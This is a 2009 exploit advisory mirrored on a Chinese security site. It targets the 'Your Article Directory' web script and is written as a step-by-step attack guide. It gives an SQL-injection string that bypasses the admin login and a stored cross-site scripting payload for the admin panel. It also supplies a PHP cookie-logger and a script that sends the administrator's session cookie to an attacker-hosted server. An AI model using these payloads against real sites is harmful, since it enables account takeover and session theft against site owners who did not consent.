首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Article Directory (Auth Bypass) SQL Injection Vulnerability
来源:vfocus.net 作者:vfocus 发布时间:2009-05-22  
  ___ ___         __                        
 /   |   \_____  |  | _____  ___ ___________
/    ~    \__  \ |  |/ /\  \/  // __ \_  __ \
\    Y    // __ \|    <  >    <\  ___/|  | \/
 \___|_  /(____  /__|_ \/__/\_ \\___  >__|  
       \/      \/     \/      \/    \/   :: Egy Coders Team Researcher
/- Your Article Directory => multiple vulnerabilities
/- site : http://www.yourarticlesdirectory.com
/- Demo : http://www.ezynearticles.com/designs/demo/yad-admin
/- Greetz : all my friends
/- http://hakxer.blogspot.com/

* hi every body
* in this vulnerability you can get Authentication to bypass admin panel
* first go to http://host/path/yad-admin/
* and in admin type
 * username : admin 'or' 1=1
 * password : hakxer
* now we in panel
* you can make a cross site scripting vulnerability in panel
* go to http://host/path/yad-admin/newpage.php
* then in title write anything and in content write
 * >"<script>alert("hakxer")</script><div style="1
* and click save page and go to http://host/path/yad-admin/pages.php
* and goto this http://host/path/yad-admin/newpages.php?id=[id]
* xss was running successfully

* if you want to get the admin cookie
* you can use cookie grabber and to make it you can see this steps :
         * first make file ( logger.php ) and input this code in it
              <?php
            $cookie = $_GET['cookie'];
            $logger = fopen("logger.txt", "a");
            fwrite($logger, $cookie ."\n");
            fclose($logger);
            ?>
         * and upload file into any webhost
         * then create logger.txt and chmod it to 777
         * now the time to attack
         * goto http://host/path/yad-admin/newpage.php
         * and in title write ( blah blah come admin ) :d
         * and in content write this js code
    <script>document.location ="http://host/path/logger.php?cookie=" + document.cookie;</script>
         * and click save page
         * now if admin go to our saved page the cookie will send to logger.txt

** notes :
        ** use it in your own risk
       
./be safe - Hakxer -

# [2009-05-21]

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Job Script 2.0 Arbitrary Shell
·Microsoft IIS 6.0 WebDAV Remot
·Flash Quiz Beta 2 Multiple Re
·Winamp 5.551 MAKI Parsing Inte
·ChinaGames (CGAgent.dll) Activ
·Winamp <= 5.55 (MAKI script) U
·BaoFeng (config.dll) ActiveX R
·ZaoCMS (user_updated.php) Remo
·ASP Inline Corporate Calendar
·Winamp <= 5.55 (MAKI script) U
·VICIDIAL 2.0.5-173 (Auth Bypas
·Mole Group Sky Hunter/Bus Tick
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved